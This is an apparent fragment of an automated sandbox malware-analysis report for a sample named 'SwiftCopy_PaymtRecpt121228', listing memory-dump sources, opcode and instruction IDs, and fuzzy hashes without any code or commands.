                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53c4f299fddefa0dc67dea5c015a0df01705b2c9441c6070dcebb2cf1712a29b
                                                    • Instruction ID: 7dc6270f6a8b11523068439b3c8c1ca446be3414b07ed9c6282a7251d5f27176
                                                    • Opcode Fuzzy Hash: 53c4f299fddefa0dc67dea5c015a0df01705b2c9441c6070dcebb2cf1712a29b
                                                    • Instruction Fuzzy Hash: FFF0AF31A147548FC711EF69E884CDEBFB8EF8631071042AFE5859B321D6309E09CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f5cc82a2432e4c18204fb0d877037b7dab3d919992252149583bb962283ce75
                                                    • Instruction ID: 7203bcb7d144d44f97f51bc628ca7069af4d4bb590a189b2cd3895d218f35a69
                                                    • Opcode Fuzzy Hash: 4f5cc82a2432e4c18204fb0d877037b7dab3d919992252149583bb962283ce75
                                                    • Instruction Fuzzy Hash: 33F0B475E01214EFCB149B75D584C6DBBB6FF8477172680E9D81997214DB319D22CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6d269ef56be625854bdcbbee2386417c81b2ec7671ac6f8fc73468000ec7d20
                                                    • Instruction ID: 716fbd933e11c81f5f539c4f3cec67487ad7b20d53b2c5496f392afe121a39b4
                                                    • Opcode Fuzzy Hash: f6d269ef56be625854bdcbbee2386417c81b2ec7671ac6f8fc73468000ec7d20
                                                    • Instruction Fuzzy Hash: E8F0C232B083149FCB19AB75F814A6E3BAAEFC5315F04842DE44787341CE749C01CB95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18169f98dfe35f455169f671ad587fab3df5fea5099a70b6f4041a0159f4fcd5
                                                    • Instruction ID: be8eca8054395b49d2d4703351d6b46e12b4dcc050685041cfe3e7fd50c44d79
                                                    • Opcode Fuzzy Hash: 18169f98dfe35f455169f671ad587fab3df5fea5099a70b6f4041a0159f4fcd5
                                                    • Instruction Fuzzy Hash: 9EF059323186600BC324461DCC48D3937AAFFDA21170D40FAE402CB762DA68CC028351
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b52725569c79c8816e8e13a4512e4628814911f763b808dd24d93eaec46cd91c
                                                    • Instruction ID: 5c59e0a6e3ecd5375902b374d7b2032d8a93ec96c433c50d8328571724a82f0b
                                                    • Opcode Fuzzy Hash: b52725569c79c8816e8e13a4512e4628814911f763b808dd24d93eaec46cd91c
                                                    • Instruction Fuzzy Hash: 30F082727002256FD3149A5ADC95EABBBEDEBC86607558079F508C7351DA31DC0182E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7549e5794bdee78a05b4bbfcfad9336997b5c64e609d4d05d8f97becbb314dce
                                                    • Instruction ID: 9c02f61d3782fc215d10d43f29b944e5a7f23f7fc8aed4b62978d52bade10071
                                                    • Opcode Fuzzy Hash: 7549e5794bdee78a05b4bbfcfad9336997b5c64e609d4d05d8f97becbb314dce
                                                    • Instruction Fuzzy Hash: 09F0377295021A8FDB50EF6CCD42BACBBB1EF44311F0489B6D418D7256E638D64A8B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065779234.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9cd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a39ed03e5e2e5e940d1ea3be501d446eed44c02913c27f5db7e42560546ea402
                                                    • Instruction ID: 7ad0409467930ff9d89588cb634769cca116437fbb0eaf3ec117cec7d9f8e162
                                                    • Opcode Fuzzy Hash: a39ed03e5e2e5e940d1ea3be501d446eed44c02913c27f5db7e42560546ea402
                                                    • Instruction Fuzzy Hash: D5F062714053449EE7108A16DD84B66FFACEF56724F18C46EED484A286C3799C44CA75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7fdc10a734bba4360bede129c8b06084034b3a5d93533618d7b1deca6f1bdaa5
                                                    • Instruction ID: 2a918e1a796ad365b74c529490359dcee21dffc89b5cbcce5a9957071a8a792d
                                                    • Opcode Fuzzy Hash: 7fdc10a734bba4360bede129c8b06084034b3a5d93533618d7b1deca6f1bdaa5
                                                    • Instruction Fuzzy Hash: 5FF06D31920B089BCB11BF2DDC0589DBB78EF96321B41832AE98567254EF71D5A4CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47d3a7e0bfa0553e709ce5e2c4bd8edee241553d5614f236cbbf59baf5404ef9
                                                    • Instruction ID: 0e99f2376aab9b62aedac0aac2d343e5f617f3c024671ef9873aacb79a1880bb
                                                    • Opcode Fuzzy Hash: 47d3a7e0bfa0553e709ce5e2c4bd8edee241553d5614f236cbbf59baf5404ef9
                                                    • Instruction Fuzzy Hash: 68F0F0363103068FCB16AB28C840CAA3BBAEF863503180466F004CF269DA719801CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f073593efa66ca47bf3278a8b73948d38ca4c6037bdb78cc227ad5e7d8f4b2da
                                                    • Instruction ID: 1793782b064a0de78c9599127af3545fee3380488a60370c6aa113ccc316c9ec
                                                    • Opcode Fuzzy Hash: f073593efa66ca47bf3278a8b73948d38ca4c6037bdb78cc227ad5e7d8f4b2da
                                                    • Instruction Fuzzy Hash: 00F01D729501098FDB50DF78C845BBDBBF5FB44306F0489BAE818D3255E639DA05DB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d26b113c7716d994c55f2f17d06dabfd198cdde5702d79bdd2d9df3df2402a6b
                                                    • Instruction ID: f25ec96b214b7534249b20f232ab1c700509fb957f3a82b1b9e86dd6ec84ef99
                                                    • Opcode Fuzzy Hash: d26b113c7716d994c55f2f17d06dabfd198cdde5702d79bdd2d9df3df2402a6b
                                                    • Instruction Fuzzy Hash: 4A01BB70805219DFDF14DFAAC408BAEBAF5BF48760F548625EC25AB290D7744A44CF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5de773a28e0b23abdc6144c30fd5209f35a02e365b427f0a0b2ad2a0031bfde6
                                                    • Instruction ID: 30e37711b343f8864a162523bdfab980d4649ea3d14ce6efd8ba9e967a62ad85
                                                    • Opcode Fuzzy Hash: 5de773a28e0b23abdc6144c30fd5209f35a02e365b427f0a0b2ad2a0031bfde6
                                                    • Instruction Fuzzy Hash: A0F054367043149FCB18AB79E444A2E77ABEFC4321B04842DE44687340CE759C05CB95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d54f4f7400f6d2ae13e7de2a83ac97f36dbdf1212ed72da0eae226ec8e5c5d23
                                                    • Instruction ID: 170a5a832d02e9eeca2b9638026bf04c546350702baa3cf0f49c8b832b4553be
                                                    • Opcode Fuzzy Hash: d54f4f7400f6d2ae13e7de2a83ac97f36dbdf1212ed72da0eae226ec8e5c5d23
                                                    • Instruction Fuzzy Hash: 30E06D72B001286F9304DAAEDC84D6BBBEDFBCC670361807AF508C7310DA319C01C6A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00996f148bc790965d76ba27a1e6648480646c3d4018a2ee205ed9229261a713
                                                    • Instruction ID: d13ca25eeb08e89408af23eb831c751f0d8dff929c437119fe9a8ea8bc59265f
                                                    • Opcode Fuzzy Hash: 00996f148bc790965d76ba27a1e6648480646c3d4018a2ee205ed9229261a713
                                                    • Instruction Fuzzy Hash: 9BF030729101198FDB50DF68C886BFD77F1FB04305F1485B6D418D7245E639D646CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5e9bd745332265fa1afeb70ba2cc18082ad1b905ec92e445c3e0cd0bd1c5e04
                                                    • Instruction ID: 48cf5e946a563554ab1873e53d161ce692f8f3327c88051525f206748be4ae62
                                                    • Opcode Fuzzy Hash: e5e9bd745332265fa1afeb70ba2cc18082ad1b905ec92e445c3e0cd0bd1c5e04
                                                    • Instruction Fuzzy Hash: 9CF0FE716147058F9F28CF28D442D9577E5FB053587340969E826CF305E7B2EC038B84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53be9d48de200d3486cf45b3c2c9510d3c8c22262607b7eb582b9db6695e2d23
                                                    • Instruction ID: a948a46d28f510fde5abcbcd4ffc02b5172b7cb19e468b51ed6fdc436111a683
                                                    • Opcode Fuzzy Hash: 53be9d48de200d3486cf45b3c2c9510d3c8c22262607b7eb582b9db6695e2d23
                                                    • Instruction Fuzzy Hash: A4E0D8363645250BC724960DDC48B6E339BEBD9A21F1840B5E406CB792DE25DC0203E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0433674141982683760c068ea2d1efbc603bcf75decaf4db4434056919a43b0e
                                                    • Instruction ID: e7f829aa5f41b0c0ab31328d45a25113a5cd4a347a54632144833383fb489d7b
                                                    • Opcode Fuzzy Hash: 0433674141982683760c068ea2d1efbc603bcf75decaf4db4434056919a43b0e
                                                    • Instruction Fuzzy Hash: CEF0B731A18115DFEF10DB6CE44AFA833F2FB48726F004069F816971A4CB7899CACB21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 319f06f7f2d13bdbef14b7c15714b91ecd7bb74e17ec8d70d449fea634dfcdbc
                                                    • Instruction ID: ed0614977d3b874b22bbadb6a59fa40b062460f2957340f9b14e8294329f2e75
                                                    • Opcode Fuzzy Hash: 319f06f7f2d13bdbef14b7c15714b91ecd7bb74e17ec8d70d449fea634dfcdbc
                                                    • Instruction Fuzzy Hash: B2F030353112169FDB18AF29D450CAA3BEEEF893603544465F509CF228DB729C01CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8303127b4f40aadfe4629d7bd7452f14d3a3e26ed5bd8ab48fd665e675319b21
                                                    • Instruction ID: c7c1795a3256c65a9e36cc601e47e068aa13676e3573034d5ca03cd392a7d5bc
                                                    • Opcode Fuzzy Hash: 8303127b4f40aadfe4629d7bd7452f14d3a3e26ed5bd8ab48fd665e675319b21
                                                    • Instruction Fuzzy Hash: F1E026367413715FC309176C5452A6B7FB69FC5B24318C0ABE586CB786DCA08E0583A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a0a44faa2d3be74f1b63fb1dc022b295039a09d499a89e106fb88da08c513e4
                                                    • Instruction ID: e5165549b1ff10b753c35cfb897a5f4e69d841f5061adcb804ba87e1c9ad9cbe
                                                    • Opcode Fuzzy Hash: 8a0a44faa2d3be74f1b63fb1dc022b295039a09d499a89e106fb88da08c513e4
                                                    • Instruction Fuzzy Hash: A3F0A73134D3814FD3215B789E10B593BA5AF41214F0505BE944ACB591D638D804C751
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4558d6717804c21de45ec63da55ccb13f1a4d991fa1bef1e6a0b91dd06c8cd19
                                                    • Instruction ID: 978208c0c2725dbfbbc87c5f389701f21bf7043bc3b11a972b8464babeaae32c
                                                    • Opcode Fuzzy Hash: 4558d6717804c21de45ec63da55ccb13f1a4d991fa1bef1e6a0b91dd06c8cd19
                                                    • Instruction Fuzzy Hash: 08E06D33610524C68718DF48F4818BAB7E9E798665318845AE90CCA610E337DC03C780
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b73fa6b8f3c2762c442bdcef0fce041fb93c76b4279de14629b55619f9d1f6b
                                                    • Instruction ID: cda608467acc9fa410ef0ceeb8cbce458790eab65b04fe0bfbc429f83169f1b3
                                                    • Opcode Fuzzy Hash: 1b73fa6b8f3c2762c442bdcef0fce041fb93c76b4279de14629b55619f9d1f6b
                                                    • Instruction Fuzzy Hash: 86F0E5332001446FCB06CE98E500BDD7F9ADF88211F08846AFE49C7161C779C912DB64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7466df2cc0687f46fee2c905fdac04309c299575217540330e931014898330a
                                                    • Instruction ID: fa9101b020fc68525c21f5d595c75b4a6a32c3a4cad3ee59c6aca0e7837d8380
                                                    • Opcode Fuzzy Hash: a7466df2cc0687f46fee2c905fdac04309c299575217540330e931014898330a
                                                    • Instruction Fuzzy Hash: 73E065312082558BCB25DB18E847A5A7BD5EB41314B24496DE446CB205E765E803CB85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc4141d27c8d294b9efcedf2fef9f75360010b89c596355e3dc91bc599325a52
                                                    • Instruction ID: 578cdf66c5e924d5f674da65b4661ef0a0cb1358b2f5a39a1c1d3f0aa507f83c
                                                    • Opcode Fuzzy Hash: bc4141d27c8d294b9efcedf2fef9f75360010b89c596355e3dc91bc599325a52
                                                    • Instruction Fuzzy Hash: 52E0ED76B0015A9FCF01DF98D8859EE77B6FB98210B008016FA18D7341D7759D22DFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d450382f57f262bbaaac426b04b643fba81c152b760d42e3c32e9dae3524059f
                                                    • Instruction ID: 9c73517f3970b7600d67c7117f68c121c40824ee8c6998a8e7dc1f32ef170624
                                                    • Opcode Fuzzy Hash: d450382f57f262bbaaac426b04b643fba81c152b760d42e3c32e9dae3524059f
                                                    • Instruction Fuzzy Hash: D8E06D322001486BCB069A49E800E9E7B9EDB88210B088416F949C3151CA75981197A5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d04fb759262b44b9ac1f249d648921d36e10f03a747f14767271ec0a03f42d2
                                                    • Instruction ID: 1d12ab0843ae6a56af4645d8a2af771f19752169feadb30b32b51c4564e2e162
                                                    • Opcode Fuzzy Hash: 3d04fb759262b44b9ac1f249d648921d36e10f03a747f14767271ec0a03f42d2
                                                    • Instruction Fuzzy Hash: F5E0D87220C35007C725D619F840D5FAB9ADEC1214704857ED455CB625DA659C0BC796
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71fc1c5801b4ad6b15b380a7a9ce45c83b6ec2dfb42eae575b01a5588418832e
                                                    • Instruction ID: 48769625d4ba66d3dd7c86517b21172d13886d1f30baed8fe46843d9be13d8dc
                                                    • Opcode Fuzzy Hash: 71fc1c5801b4ad6b15b380a7a9ce45c83b6ec2dfb42eae575b01a5588418832e
                                                    • Instruction Fuzzy Hash: B8E0C2363506150BC728A60DD808D7E339FEFCDA21B1880BAE90AC7766CE35DC4247A5
                                                    • Instruction Fuzzy Hash: C4C08C36300208BFDB81AFD4C800D56776DBB08720F60D000FE0C0E201C272EC62DBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a9b1daac665d6066fdf16082c41ee02a2c6c47410abe889b9e6b46d7e331582
                                                    • Instruction ID: c02984e38cf710b9350c38933a6e1855be41ccd2852e2853d96478d0e953ce42
                                                    • Opcode Fuzzy Hash: 4a9b1daac665d6066fdf16082c41ee02a2c6c47410abe889b9e6b46d7e331582
                                                    • Instruction Fuzzy Hash: 37B09232B08638670909329D74188AFB79ECA89971304006FFD0A973409EA92D0382EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9ec71c902f1d008d41949e973b1ea7faf983a2ca7ac54df9480d479c9678237
                                                    • Instruction ID: 4bdd28e130c5e0625415ccc8ce9df19a3be8a0c55fc294bfe2203adc60c9245f
                                                    • Opcode Fuzzy Hash: f9ec71c902f1d008d41949e973b1ea7faf983a2ca7ac54df9480d479c9678237
                                                    • Instruction Fuzzy Hash: D9C04C32244108BBCB027E81DD05E5ABF2ABB557A4F248055FF080D161E773D963EBD4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c287a3faf57057b05b2a1964e2711f6e4ab83640c9357b63392dec71db8166ce
                                                    • Instruction ID: e3da9fb53f67f1800bf9c3770deb0ed88bbd05f47de91de1009f3e9a12863065
                                                    • Opcode Fuzzy Hash: c287a3faf57057b05b2a1964e2711f6e4ab83640c9357b63392dec71db8166ce
                                                    • Instruction Fuzzy Hash: 7FC0027A0141099ECB42AF94D609FA97BE5BB69318F1988B5A54885061E7328468AB02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec236de46a24c976d73821fd3cb581ae53e088a212b560b73ae10ae258e8d632
                                                    • Instruction ID: 65d28fb213cacdec2ebbdc477f291d4c2baa6c17d7420e66ef92f5205b874736
                                                    • Opcode Fuzzy Hash: ec236de46a24c976d73821fd3cb581ae53e088a212b560b73ae10ae258e8d632
                                                    • Instruction Fuzzy Hash: 05C04C355550149A9641FF54C684C2EBEE5FF557107848855A544460719635C41C9B12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb3aadd932a165aaac8797af7a2e2d245f1ebbaabeb5170f8b0180ac6ed37b66
                                                    • Instruction ID: 0e8fa0086120f4223646f0dd1bff248a22fd8a8f62a8693952af4b620162ff39
                                                    • Opcode Fuzzy Hash: fb3aadd932a165aaac8797af7a2e2d245f1ebbaabeb5170f8b0180ac6ed37b66
                                                    • Instruction Fuzzy Hash: A0B09B35705460474A052254311446E7B26C644521304006FED59573408D380D07C189
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                    • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da8ae70b7af74241118f5c07f29eb3edac8500f77dfeee185d53ffc3425a55b5
                                                    • Instruction ID: cb05cec71007de032176773652328d3f26e2076f1624da04be0418e16be8f41e
                                                    • Opcode Fuzzy Hash: da8ae70b7af74241118f5c07f29eb3edac8500f77dfeee185d53ffc3425a55b5
                                                    • Instruction Fuzzy Hash: 66B012A2D0401147CE440560D88E30D3230D320301F5C0024E204CB3C0EE1480024551
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 98R
                                                    • API String ID: 0-576591972
                                                    • Opcode ID: 1e4a7d84871f7837e830f83a9fb51d607008c50628076c157617c3134e1bd045
